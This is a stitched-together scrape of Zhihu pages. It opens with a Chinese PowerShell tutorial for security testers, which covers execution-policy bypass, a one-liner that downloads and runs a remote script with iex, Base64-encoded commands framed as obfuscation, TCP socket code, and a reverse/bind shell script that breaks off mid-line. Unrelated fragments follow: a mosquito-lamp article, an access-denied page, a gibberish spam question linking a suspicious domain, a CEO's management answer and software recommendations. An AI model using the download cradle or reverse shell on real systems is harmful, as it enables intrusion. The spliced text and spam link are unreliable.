&/code&&/pre&&/div&&h2&Powershell(3)-脚本执行基础&/h2&&h2&开始之前&/h2&&p&我们在开始之前先来介绍在windows平台中常用到的几种脚本&/p&&h2&Bat&/h2&&p&这就是我们常用的Bat脚本,全名为批处理文件,脚本中就是我们在CMD中使用到的命令,这里提一个小问题:CMD的命令行执行命令的优先级是&code&.bat & .exe&/code&,那么假如我放一个cmd.bat在system32目录下,那么优先执行的是cmd.bat,这里面的内容就变得不可描述起来了&/p&&h2&VBscript&/h2&&p&执行vbs就是常说的vbscript,是微软为了方便自动化管理windows而推出的脚本语言,这里了解一下即可,不是文章重点。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&一个小例子通过vbs操作WMI
Set wmi = GetObject(&winmgmts:&)
Set collection = wmi.ExecQuery(&select * from Win32_Process&)
For Each process in collection
WScript.Echo process.getObjectText_
&/code&&/pre&&/div&&h2&Powershell&/h2&&p&这就是我们的主角,在现在和未来一定是powershell占据主要地位(对于这一点搞Win多一点的朋友一定不会怀疑),首先我们来看一个简单的例子&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&script.ps1:
# 脚本内容
function test-conn { Test-Connection
-Count 2 -ComputerName $args}
# 载入脚本文件
.script.ps1
# 调用函数
test-conn localhost
&/code&&/pre&&/div&&h2&Powershell执行策略&/h2&&p&那么你可能会在调用脚本的时候出现报错,这是powershell的安全执行策略,下面我们来了解一下执行策略:PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略简单介绍各种策略如下:&/p&&p&名称说明Restricted受限制的,可以执行单个的命令,但是不能执行脚本Windows 8, Windows Server 2012, and Windows 8.1中默认就是这种策略,所以是不能执行脚本的,执行就会报错,那么如何才能执行呢?Set-ExecutionPolicy -ExecutionPolicy Bypass就是设置策略为Bypass这样就可以执行脚本了。AllSignedAllSigned 执行策略允许执行所有具有数字签名的脚本RemoteSigned当执行从网络上下载的脚本时,需要脚本具有数字签名,否则不会运行这个脚本。如果是在本地创建的脚本则可以直接执行,不要求脚本具有数字签名。Unrestricted这是一种比较宽容的策略,允许运行未签名的脚本。对于从网络上下载的脚本,在运行前会进行安全性提示。需要你确认是否执行脚本BypassBypass 执行策略对脚本的执行不设任何的限制,任何脚本都可以执行,并且不会有安全性提示。UndefinedUndefined 表示没有设置脚本策略。当然此时会发生继承或应用默认的脚本策略。&/p&&p&那么我们如何绕过这些安全策略呢?下面提供几种方法,网上还有很多的绕过方法,大家可以自行研究:&/p&&p&名称说明Get-ExecutionPolicy获取当前的执行策略Get-Content .test.ps1 | powershell.exe -noprofile –通过管道输入进pspowershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘&a href=&http://link.zhihu.com/?target=http%3A//192.168.1.2/test.ps1& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&192.168.1.2/test.ps1&/span&&span class=&invisible&&&/span&&/a&‘)”通过远程下载脚本来绕过|bytes = [System.Text.Encoding]::Unicode.GetBytes(encodedCommand =[Convert]::ToBase64String(encodedCommand|通过BASE64编码执行|&/p&&h2&powershell的脚本调用方法:&/h2&&ol&&li&如果脚本是直接写的代码而不是只定义了函数那么直接执行脚本.script.ps1即可&/li&&li&但是如果是载入里面的函数需要&code&.+空格+.script.ps1&/code&&/li&&li&或者使用Import-Module .script.ps1, 这样才能直接使用脚本的函数&/li&&/ol&&h2&通过控制台执行Powershell&/h2&&p&对于我们安全测试人员通常获取到的一个Shell是CMD的, 那么我们想要尽可能少的操作就可以直接通过控制台来执行powershell的命令, 那么先来看一个简单的例子:&/p&&p&&br&&/p&&figure&&img src=&https://pic4.zhimg.com/v2-4fe30bbb5d3d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1334& data-rawheight=&616& class=&origin_image zh-lightbox-thumb& width=&1334& data-original=&https://pic4.zhimg.com/v2-4fe30bbb5d3d_r.jpg&&&/figure&&p&&br&&/p&&p&可以看到我们通过CMD界面执行了Powershell的代码, 那么其实这样的执行方式在真实的安全测试环境中利用更多, 下面是一个Powershell通过这种方式执行的所有可选的参数:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&PowerShell[.exe]
[-PSConsoleFile &file& | -Version &version&]
[-EncodedCommand &Base64EncodedCommand&]
[-ExecutionPolicy &ExecutionPolicy&]
[-File &filePath& &args&]
[-InputFormat {Text | XML}]
[-NonInteractive]
[-NoProfile]
[-OutputFormat {Text | XML}]
[-WindowStyle &style&]
[-Command { - | &script-block& [-args &arg-array&]
| &string& [&CommandParameters&] } ]
PowerShell[.exe] -Help | -? | /?
&/code&&/pre&&/div&&p&名称解释-Command需要执行的代码-ExecutionPolicy设置默认的执行策略,一般使用Bypass-EncodedCommand执行Base64代码-File这是需要执行的脚本名-NoExit执行完成命令之后不会立即退出,比如我们执行powerhsell whoami 执行完成之后会推出我们的PS会话,如果我们加上这个参数,运行完之后还是会继续停留在PS的界面-NoLogo不输出PS的Banner信息-Noninteractive不开启交互式的会话-NoProfile不使用当前用户使用的配置文件-Sta以单线程模式启动ps-Version设置用什么版本去执行代码-WindowStyle设置Powershell的执行窗口,有下面的参数Normal, Minimized, Maximized, or Hidden&/p&&p&最后举一个执行Base64代码的例子:&/p&&ol&&li&我们先试用上面一个表格提到的编码代码编码命令&code&whoami&/code&, 得到字符串:&code&dwBoAG8AYQBtAGkACgA=&/code&&/li&&li&通过下面的命令来执行代码&/li&&/ol&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&powershell -EncodedCommand dwBoAG8AYQBtAGkACgA=
&/code&&/pre&&/div&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-b577e41bc06b57dd77a43b7cd827b9ac_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1142& data-rawheight=&100& class=&origin_image zh-lightbox-thumb& width=&1142& data-original=&https://pic1.zhimg.com/v2-b577e41bc06b57dd77a43b7cd827b9ac_r.jpg&&&/figure&&p&&br&&/p&&p&那么这种需求在什么地方呢? 比如我们的代码特别长或者会引起一起歧义的时候就需要我们使用这种方式去执行, 同时也是一个混淆的方式。&/p&&h2&Powershell(4)-Socket网络编程&/h2&&blockquote&这一小节我们介绍Powershell中的Socket编程,网络编程是所有语言中绕不开的核心点,下面我们通过对代码的分析来让大家对PS中的Socket有一个初步的了解。&/blockquote&&h2&Socket-Tcp编程&/h2&&p&开始之前我们先想想为什么要学习socket编程,那么最直观的是端口扫描,那么还有可能是反弹shell之类的应用。进行Socket编程只需要调用.Net框架即可,这里先使用TCP来示例:&/p&&p&这里是去打开一个TCP连接到本地的21端口,并获取21端口返回的Banner信息,其中GetOutput函数看不了可以先不看,其用来获取stream中的数据,主要看Main函数内容:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Tcp-Demo.ps1
function GetOutput
## 创建一个缓冲区获取数据
$buffer = new-object System.Byte[] 1024
$encoding = new-object System.Text.AsciiEncoding
$outputBuffer = &&
$findMore = $false
## 从stream读取所有的数据,写到输出缓冲区
start-sleep -m 1000
$findmore = $false
# 读取Timeout
$stream.ReadTimeout = 1000
$read = $stream.Read($buffer, 0, 1024)
if($read -gt 0){
$findmore = $true
$outputBuffer += ($encoding.GetString($buffer, 0, $read))
} catch { $findMore = $ $read = 0 }
} while($read -gt 0)
} while($findmore)
$outputBuffer
function Main{
# 定义主机和端口
$remoteHost = &127.0.0.1&
$port = 21
# 定义连接Host与Port
$socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port)
# 进行连接
$stream = $socket.GetStream()
# 获取Stream
$writer = new-object System.IO.StreamWriter $stream
# 创建IO对象
$SCRIPT:output += GetOutput
# 声明变量
if($output){
foreach($line in $output.Split(&`n&))
write-host $line
$SCRIPT:output = &&
&/code&&/pre&&/div&&p&我们来看看输出结果:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&PS C:UsersrootclayDesktoppowershell& . .Tcp-Demo.ps1
220 Microsoft FTP Service
&/code&&/pre&&/div&&p&这样就打开了21端口的连接,并且获取到了21端口的banner信息。那么有过端口扫描编写的朋友肯定已经看到了,这种方式是直接打开连接,并不能获取到一些需要发包才能返回banner的端口信息,典型的80端口就是如此,我们需要给80端口发送特定的信息才能得到Response, 当然还有许多类似的端口,比如3389端口, 下面我们来看看我们如何使用powershell实现这项功能.&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Tcp-Demo2.ps1
function GetOutput
... # 代码和上面的一样
function Main{
# 定义主机和端口
$remoteHost = &127.0.0.1&
$port = 80
# 定义连接Host与Port
$socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port)
# 进行连接
$stream = $socket.GetStream()
# 获取Stream
$writer = new-object System.IO.StreamWriter $stream
# 创建IO对象
$SCRIPT:output += GetOutput
# 声明变量, userInput为要发包的内容,这里我们需要发送一个GET请求给Server
$userInput = &GET / HTTP/1.1 `nHost: localhost
# 定义发包内容
foreach($line in $userInput)
# 发送数据
$writer.WriteLine($line)
$writer.Flush()
$SCRIPT:output += GetOutput
if($output){
foreach($line in $output.Split(&`n&))
write-host $line
$SCRIPT:output = &&
&/code&&/pre&&/div&&p&我们来看看输出:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&PS C:UsersrootclayDesktoppowershell& . .Tcp-Demo2.ps1
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: &5e26ec16b73ad31:0&
Server: Microsoft-IIS/7.5
Content-Length: 689
&!DOCTYPE html PUBLIC &-//W3C//DTD XHTML 1.0 Strict//EN& &http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&&
&html xmlns=&http://www.w3.org/1999/xhtml&&
&meta http-equiv=&Content-Type& content=&text/ charset=iso-8859-1& /&
&title&IIS7&/title&
&style type=&text/css&&
&/code&&/pre&&/div&&p&我们下面对这项功能进行一个整合:我们可以发包给一个端口,也可以直接连接一个端口,这里已经实现TCP,http,https三种常见协议的访问&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&########################################
## Tcp-Request.ps1
## Example1:
## $http = @&
## GET / HTTP/1.1
## Host:127.0.0.1
## `n 在Powershell中代表换行符
## $http | .Tcp-Request localhost
## Example2:
## .Tcp-Request localhost 80
########################################
## 管理参数输入param()数组
[string] $remoteHost = &localhost&,
[int] $port = 80,
[switch] $UseSSL,
[string] $inputObject,
[int] $commandDelay = 100
[string] $output = &&
## 获取用户输入模式
$currentInput = $inputObject
if(-not $currentInput)
$SCRIPT:currentInput = @($input)
# 脚本模式开关, 如果脚本能读取到输入, 使用发包模式, 如果没有输入使用TCP直连模式
$scriptedMode = [bool] $currentInput
function Main
## 打开socket连接远程机器和端口
if(-not $scriptedMode)
write-host &Connecting to $remoteHost on port $port&
## 异常追踪
trap { Write-Error &Could not connect to remote computer: $_&; exit }
$socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port)
if(-not $scriptedMode)
write-host &Connected. Press ^D(Control + D) followed by [ENTER] to exit.`n&
$stream = $socket.GetStream()
## 如果有SSl使用SSLStream获取Stream
if($UseSSL)
$sslStream = New-Object System.Net.Security.SslStream $stream,$false
$sslStream.AuthenticateAsClient($remoteHost)
$stream = $sslStream
$writer = new-object System.IO.StreamWriter $stream
while($true)
## 获取得到的Response结果
$SCRIPT:output += GetOutput
## 如果我们使用了管道输入的模式,我们发送我们的命令,再接受输出,并退出
if($scriptedMode)
foreach($line in $currentInput)
$writer.WriteLine($line)
$writer.Flush()
Start-Sleep -m $commandDelay
$SCRIPT:output += GetOutput
## 如果没有使用事先管道输入的模式直接读取TCP回包
if($output)
# 逐行输出
foreach($line in $output.Split(&`n&))
write-host $line
$SCRIPT:output = &&
## 获取用户的输入,如果读取到^D就退出
$command = read-host
if($command -eq ([char] 4)) { }
$writer.WriteLine($command)
$writer.Flush()
## Close the streams
$writer.Close()
$stream.Close()
## 如果我们使用了管道输入的模式,这里输出刚才读取到服务器返回的数据
if($scriptedMode)
## 获取远程服务器的返回数据
function GetOutput
## 创建一个缓冲区获取数据
$buffer = new-object System.Byte[] 1024
$encoding = new-object System.Text.AsciiEncoding
$outputBuffer = &&
$findMore = $false
## 从stream读取所有的数据,写到输出缓冲区
start-sleep -m 1000
$findmore = $false
$stream.ReadTimeout = 1000
$read = $stream.Read($buffer, 0, 1024)
if($read -gt 0)
$findmore = $true
$outputBuffer += ($encoding.GetString($buffer, 0, $read))
} catch { $findMore = $ $read = 0 }
} while($read -gt 0)
} while($findmore)
$outputBuffer
&/code&&/pre&&/div&&p&那么至此我们已经完成了对TCP端口的打开并获取对应的信息,其中很多的关键代码释义我已经详细给出,我们主要以TCP为例,由于UDP应用场景相对于TCP较少,关于UDP的编写可自行编写。这个脚本加以修改就是一个Powershell完成的扫描器了,端口扫描器我们放在下一节来分析,我们这里最后看一个反弹shell的ps脚本, 同样在注释中详细解释了代码块的作用。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&function TcpShell{
.DESCRIPTION
一个简单的Shell连接工具, 支持正向与反向
.PARAMETER IPAddress
Ip地址参数
.PARAMETER Port
反向连接模式
PS & TcpShell -Reverse -IPAddress 192.168.254.226 -Port 4444
正向连接模式
PS & TcpShell -Bind -Port 4444
IPV6地址连接
PS & TcpShell -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
# 参数绑定
[CmdletBinding(DefaultParameterSetName=&reverse&)] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName=&reverse&)]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName=&bind&)]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName=&reverse&)]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName=&bind&)]
[Parameter(ParameterSetName=&reverse&)]
[Parameter(ParameterSetName=&bind&)]
# 如果检测到Reverse参数,开启反向连接模式
if ($Reverse)
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
# 使用正向的连接方式, 绑定本地端口, 用于正向连接
if ($Bind)
# Tcp连接监听服务端
$server = [System.Net.Sockets.TcpListener]$Port
# Tcp连接开始
$server.start()
# Tcp开始接受连接
$client = $server.AcceptTcpClient()
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
# 返回给连接的用户一个简单的介绍,目前是使用什么的用户来运行powershell的, 并打印powershell的banner信息
$sendbytes = ([text.encoding]::ASCII).GetBytes(&Windows PowerShell running as user & + $env:username + & on & + $env:computername +
&`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n&)
$stream.Write($sendbytes,0,$sen}
这是其发明者在TED 2010年会上的演讲。
已经买了灭蚊灯怎么办?首先,不建议你退货,这是为了我的安全!毕竟淘宝上有一大堆商家靠这个吃饭,你如果退货,我铁定会被他们骂死!X﹏X这也不利于创造更多就业机会和GDP,更不利于建设和谐社会!其次,灭蚊灯有很好的心理安慰作用!虽然杀不死蚊子,但至少杀死了蚊子的表兄妹。^_^||| 痒痒的抓心挠肝的时候,噼啪、噼啪!电死你妹的也可以出出气,反正表妹也是妹!很多中药、保健品本质上就是安慰剂,不一样卖的很好吗?所以就把灭蚊灯当安慰剂吧!结论吸血的蚊子不会被紫外线灯吸引。紫外线灯“ 吸引 ”的是白天靠紫外线导航的飞虫,例如摇蚊。紫外线灯杀死大量不吸血的摇蚊,这让很多人误以为紫外线可以吸引吸血蚊子。使用电蚊香片比灭蚊灯更有效。如果我是灭蚊灯老板,知道大势已去,就会把所有存货的蓝灯全改成红灯,并到处说紫外线灯是骗人的,红外线灭蚊才是科学的,云云……这叫走自己的路,让别人无路可走!One more thing…看完了别忘支持点赞啊,让更多人知道真相!参考文献5.5K221 条评论分享收藏文章被以下专栏收录每个人的心智中都有陷阱,只是我们身陷其中无法感知。走出陷阱就是对心智的解放,好的答案可以拆掉思维习惯里的条条框框,可以突破认知能力的玻璃天花板,可以飞到更高维度向下观察。
拆除难免会痛,有时是反直观、反常识、反舒适区的,会痛得让人大骂:“谁让你拆的?滚!”
先前为了自嘲,索性把专栏名从“张英锋说”改为“锋之蛊”。现在为了弘扬正能量,改名“自由心智”:P
所以关注本专栏的人,都是有好奇心和宽容心的人,感谢你们。拒绝访问 | www.sglynp.com | 百度云加速
请打开cookies.
此网站 (www.sglynp.com) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(40b527bfaad64370-ua98).
重新安装浏览器,或使用别的浏览器厅难www确定298dd聚体的,恢复日期298dd向似的com怎么找_百度知道
厅难www确定298dd聚体的,恢复日期298dd向似的com怎么找
我有更好的答案
很简单通过【298d.qe5w.biz】即可联机
为您推荐:
其他类似问题
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。我是一个中型创业型公司的CEO,目前管理的公司约200人左右,经历了公司三年从几个人到现在的过程,我曾经在BAT工作过,也在国企工作过,也在小公司工作过,做过专员,做过经理,做过总监,遇到过很好的老板,也遇到过看似牛逼但超级不靠谱的老板,所以我对做员工和做老板两方面都深有体会,我想我有资格来回答一下这个题目。&/p&&p& 先说说我自己的看法,部分认同该文章的观点,高票答案完全站在一个员工的角度来回答,未免有失偏颇,我参照高票答案的回答,我从我的角度也一条条来回答一下。&/p&&p&1、&b&“我非常赞同高薪养人,但我不认同企业一开始就高薪,你钱都还没赚回来,你就高薪,你知道赚钱是需要过程的,当过程的结果都还没到来的时候,你就死掉了”&/b&&/p&&p&这条我是同意的,我从来不招那种简历看似很华丽,但薪资要求非常高的员工,第一:你不知道他以往的华丽的职业经历到底是他的平台给他的加分还是他自己的能力,第二:你同样不知道他是否到新公司后能适应新的环境,我们很少空降高管,我们公司不管从创始人到基层,薪资在行业内只能算中上水平(大概比中等水平高20%),公司有比较严格的按等级晋升制度,你在什么等级,就会大概是什么薪资,老员工每一年会有一次调薪机会,总体上来说新员工刚进来的时候不太可能比同等级的老员工薪资还要高,我的理念是,老员工才是最重要的,他们是公司的基石,新员工我可以不要,重新再找,老员工走掉一个,公司损失就会很大,所以绝对不能让老员工尤其是核心员工寒心。&/p&&p&2&b&、“有些企业老板,不知道从那个大佬那里听来的理论,要用最高的薪资聘请最优秀的人才。这个道理听里来不错,但能执行吗?”&/b&&/p&&p&跟上面一样,我也赞同这一条,创业型公司千万不能想着用最高的薪资聘请最优秀的人才,因为作为创业型公司的CEO,你的水平代表了这个公司的最高水平,你都不优秀,你不可能招的到招的起优秀的人才,我们最需要的是合适的薪资招到有忠诚度,愿意学习,可以在公司长期服务的员工,这才是创业公司最需要的,毕竟,创业公司最重要的是保证能活着,才有未来发展的机会。&/p&&p&3、&b&“为高薪而共同奋斗,别抱怨你的薪资低了,每个人其实都有自己的选择,你的收入不够高是因为你还不够努力。”&br&&/b&部分赞同这一条,确实应该整个公司的人为了高薪和共同奋斗,但奋斗的不是底薪,而是你在公司的地位和股权,我们公司实行全员持股(入职半年以上的员工都有机会拿期权),我们参考了华为的期权和虚拟受限股制度,期权采取分红方式,每个季度按照公司利润除以股价来做分红,虚拟受限股由员工出钱购买,也可以参与分红,并且可以享受公司利润增长,股份增值后的更多空间,有购买虚拟受限股的,我们给予更多升职和培养的机会,毕竟证明你对公司是认可的(目前公司大概有74%的员工购买了虚拟受限股),不够努力的员工确实在我们公司不会有太高的收入。&/p&&p&4、&b&“最近我招聘了一个新人,我问了他一些他之前公司情况,做的都是非常大的客户,也很有价值,他也说他们公司福利非常的好,对员工也宽容。但我最后问他为什么那么好的公司却要选择离开?他的回答让人乍舌,“公司垮了”。”&/b&&/p&&p&这个我也不同意,公司垮不垮和对员工是否宽容没有直接联系,这个是强行加到一起,不然你怎么解释那些老国企的老员工天天在公司划水,母公司照样赚大钱,公司是否能运营下去还是要看公司的市场竞争力,管理水平和整体的市场环境,和是否对员工宽容没有关系。&/p&&p&5、&b&“作为企业主,作为管理者,你要帮助员工成长,帮助员工获得更好的收入,体面的生活,这才是对他未来的负责。”&/b&&/p&&p&这句话说的并不是压榨员工,而是说要给员工尤其是基层员工更好的升职加薪预期和机会,我是这么做的,&/p&&p&第一:每年有年度调薪制度,人人都有机会加薪,只要你在现有的岗位上表现优秀;&/p&&p&第二:给基层员工设定标准和晋升计划,怎么样的标准才可以晋升是有比较规范的指标在指导的,如果你对现有的工作厌倦,我们同样可以提供调整岗位和方向的机会,比如我们公司就有原来做客服的员工后来因为兴趣调到设计部,后来又自学前端教程,经过一段时间培养升为前端工程师的,这期间这个员工的薪资翻了一倍多,而公司又节省了猎头费和招募新员工的时间成本,并且获得了员工的忠诚,同时也成为了公司基层员工的榜样和目标,所以管理者确实要帮助员工成长,才能获得更多员工的支持和忠诚。&/p&&p&第三:我们同样也实行末位淘汰制度,每个部门工作表现排最后的员工只要不是工作态度和工作纪律的问题,我们优先提供转岗机会,保证员工能找到能与自己兴趣和能力相匹配的方向。&/p&&p&6、&b&“创业中,我们最需要的是跑的快跑的稳,公司资源本身非常有限,人力一样的,你朝九晚五的,一天能做多少事?你怎么在残酷的市场竞争中获胜?华为为什么市值是BAT的总和还要多?我和他们曾有个几个月的业务交集,对华为员工来说,没有白天黑夜,只有什么时候完成任务。”&/b&&/p&&p&这个我不太认同,华为的成功并非完全因为的他们的加班制度,他们提供更高的行业薪资和愿意把股份分配给员工让员工愿意和公司一起成长才是成功的关键,说说我的做法:&/p&&p& 第一,不鼓励加班,鼓励员工所有工作尽量工作时间完成,正常节假日都放,福利给足,如果项目实在有需要的时候,经直接主管同意允许加班,给加班费,但是有一个例外,经理级别以上的不给加班费,第二条我会说到为什么这么做;&/p&&p&
第二,我把员工按层次做两个定位,经理级别以上的,我们看成是公司核心员工,是公司的合伙人,公司不会给加班费,你见过公司的创始人要求公司给加班费的吗?相反的是,我们会依照工作表现和在公司供职时间配发期权和虚拟受限股,所有的福利,期权发放都会向经理级别以上倾斜,保证经理以上的整体收入水平在行业内达到顶级水准。&/p&&p& 我作为员工的时候,也是很讨厌没事非得要呆在公司的制度,比如原来在阿里供职的时候,我就适应不了那种环境,平时就算没事,也需要呆在公司,直到你的主管走了,你才能走,基本上都是在晚上十点左右了,这样自己没有私人时间,上班的时候在磨洋工,我真的不觉得这样的制度是一个好的制度,阿里实际上有这方面的问题,他们一直是加班不给加班费的。&/p&&p&7、&b&“形成今日事今日毕的、企业文化。&/b&我调查了20多家倒闭的创业企业,后来我发现,他们都有一个共同的特点,除了老板,几乎没有人加班。&b&”&/b&&/p&&p&这条我不同意,我觉得一家好的公司的标准是反过来的,不是“除了老板,几乎没有人加班”,而是“除了老板不加班,其他人都愿意加班”,比如阿里,你什么时候见到过马云爸爸每天在公司加班到深夜?一个好的CEO是要培养一帮值得信任,扛得住责任的中高管,你要充分信任他们,大部分决定要由他们去判断,他们去执行,大多数时候,CEO在不在,都不影响这家公司的正常运作,这才是一家好公司,我基本上对公司的事情不先做决定,也不搞一言堂,你们来提建议和意见,我只负责最终的决策(少数十分重大的战略决策除外)。&/p&&p&作为员工的时候,我遇到过一个从房地产转行过来做互联网公司(O2O)的老板,他真的对互联网几乎一无所知,但是他传承了以前做房地产的习惯,什么都是一言堂,每天自己在公司加班到很晚(虽然我也不知道他加班能做什么),看某个员工的表现不是看能力,看业绩,而是先看他是不是跟他一样能加班,跟员工和高管谈话的时候有书记员在旁边做记录,每一句话都记下来,基本上员工很难就任何一个问题去说服他,最后这家公司的结局是员工离职率超高,老板把自己辛辛苦苦做房地产二十年的钱全都赔在了这家公司。&/p&&p&先回答到这里,其他我有想到的,或者评论里提到的,我再来慢慢回答。&/p&
我是一个中型创业型公司的CEO,目前管理的公司约200人左右,经历了公司三年从几个人到现在的过程,我曾经在BAT工作过,也在国企工作过,也在小公司工作过,做过专员,做过经理,做过总监,遇到过很好的老板,也遇到过看似牛逼但超级不靠谱的老板,所以我对做…
&p&良心软件三大特征:一是超好用!二是无广告!三是性价比高!&/p&&p&说说我近几年爱上的五款软件(直接在官网打开即可,都可免费使用,有的也有付费版)&/p&&hr&&h2&&b&简道云(地址:&/b&&a href=&//link.zhihu.com/?target=https%3A//www.jiandaoyun.com/%3Futm_source%3Dzhihu& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.jiandaoyun.com&/a&&b&)&/b&&/h2&&p&适合:适用于各行各业,超自由的工作效率提高神器~&/p&&p&这款软件是我今年才发现的神器,自从上手后,我有段时间基本逢人就安利!&/p&&p&我们公司平时人事需要收集订餐信息,在电脑浏览器上打开简道云→做好应用→然后绑定到企业微信/阿里钉钉/微信上,就能在手机上收集大家的订餐信息:&/p&&figure&&img src=&https://pic2.zhimg.com/v2-17cfca6b1d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&2054& data-rawheight=&1188& class=&origin_image zh-lightbox-thumb& width=&2054& data-original=&https://pic2.zhimg.com/v2-17cfca6b1d_r.jpg&&&/figure&&p&除此外,像什么进销存、OA办公、客户关系管理的应用都可以用简道云制作,制作的过程也很简单,非常简单:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-2d2cdb53cf0e646dd1e7a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1268& data-rawheight=&794& class=&origin_image zh-lightbox-thumb& width=&1268& data-original=&https://pic3.zhimg.com/v2-2d2cdb53cf0e646dd1e7a_r.jpg&&&/figure&&p&应用都是随便自己控制,手机电脑都能用,也不用编程,超方便,推荐!&/p&&hr&&h2&&b&199it(地址:&a href=&//link.zhihu.com/?target=http%3A//www.199it.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.199it.com&/a&)&/b&&/h2&&p&适用:喜欢搜集和下载互联网报告的人&/p&&p&这个网站是去年参加一个线上互联网大会知道的,然后加入收藏夹后再也没删掉。如果你是互联网从业人员,可以经常上来看看报告,分析得很客观又浅显,不故弄玄虚不装逼:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-81e4e0a01417bfdf4c90_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1040& data-rawheight=&630& class=&origin_image zh-lightbox-thumb& width=&1040& data-original=&https://pic1.zhimg.com/v2-81e4e0a01417bfdf4c90_r.jpg&&&/figure&&p&图片清晰度很高,艾瑞咨询等比较知名的调查报告分析平台的报告都有,还能免费获取原报告:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-4d77c85ccd1a8c16b02d9a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1007& data-rawheight=&467& class=&origin_image zh-lightbox-thumb& width=&1007& data-original=&https://pic3.zhimg.com/v2-4d77c85ccd1a8c16b02d9a_r.jpg&&&/figure&&p&整个页面也很干净,不会跳出乱七八糟的广告~听说爱看调查报告的人,智商都不会低。&/p&&hr&&h2&&b&iconfont(地址:&a href=&//link.zhihu.com/?target=http%3A//www.iconfont.cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.iconfont.cn&/a&)&/b&&/h2&&p&适用:需要下载png图标的设计师/PPT人&/p&&p&这个网站是阿里做的图标库网站,页面完全没广告:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-60d37fecc45e0f8d8028_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1566& data-rawheight=&745& class=&origin_image zh-lightbox-thumb& width=&1566& data-original=&https://pic1.zhimg.com/v2-60d37fecc45e0f8d8028_r.jpg&&&/figure&&p&还能下载各种各样的图标PNG/AI原素材,就是设计师的福音~阿里果然财大气粗,市面上像这样支持免费下载PNG的网站,真的没几家。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-11eec764decd11d9bb1e_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1049& data-rawheight=&721& class=&origin_image zh-lightbox-thumb& width=&1049& data-original=&https://pic3.zhimg.com/v2-11eec764decd11d9bb1e_r.jpg&&&/figure&&p&除了设计师以外,很多常常制作PPT的小伙伴也非常适用这个网站呢~&/p&&hr&&h2&&b&Screen to Gif(地址:&a href=&//link.zhihu.com/?target=http%3A//www.screentogif.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.screentogif.com/&/a&)&/b&&/h2&&p&适用:需要录制GIF图的小伙伴&/p&&p&看起来是个英文软件,其实支持中文版,可以切换成中文模式~&/p&&p&支持在线录制GIF图,还能控制帧数大小,加水印边框都随便你。(功能如下)&/p&&figure&&img src=&https://pic3.zhimg.com/v2-416e1d9b621874ade38406_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&717& data-rawheight=&210& class=&origin_image zh-lightbox-thumb& width=&717& data-original=&https://pic3.zhimg.com/v2-416e1d9b621874ade38406_r.jpg&&&/figure&&p&这款软件不仅没有广告,甚至不需要安装,直接下载下来打开就好,非常轻便的一款小软件,好用程度堪称同行第一:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-01bb606f11f_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&904& data-rawheight=&228& class=&origin_image zh-lightbox-thumb& width=&904& data-original=&https://pic3.zhimg.com/v2-01bb606f11f_r.jpg&&&/figure&&hr&&blockquote&&i&这里本来应该有个软件推荐,但是……(hhh看评论区)&/i&&/blockquote&&figure&&img src=&https://pic2.zhimg.com/v2-1812add21c2bd6d379ccb9_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1050& data-rawheight=&177& class=&origin_image zh-lightbox-thumb& width=&1050& data-original=&https://pic2.zhimg.com/v2-1812add21c2bd6d379ccb9_r.jpg&&&/figure&&hr&&h2&&b&everything(地址:&a href=&//link.zhihu.com/?target=http%3A//www.voidtools.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&www.voidtools.com&/a&)&/b&&/h2&&p&适用:本地文件搜索神器&/p&&p&其实这款软件大家都推荐得很多了,不过我看到很多人截图都是英文版,everything是有中文版中文版中文版的!英语不好的小伙伴们不用担心~&/p&&figure&&img 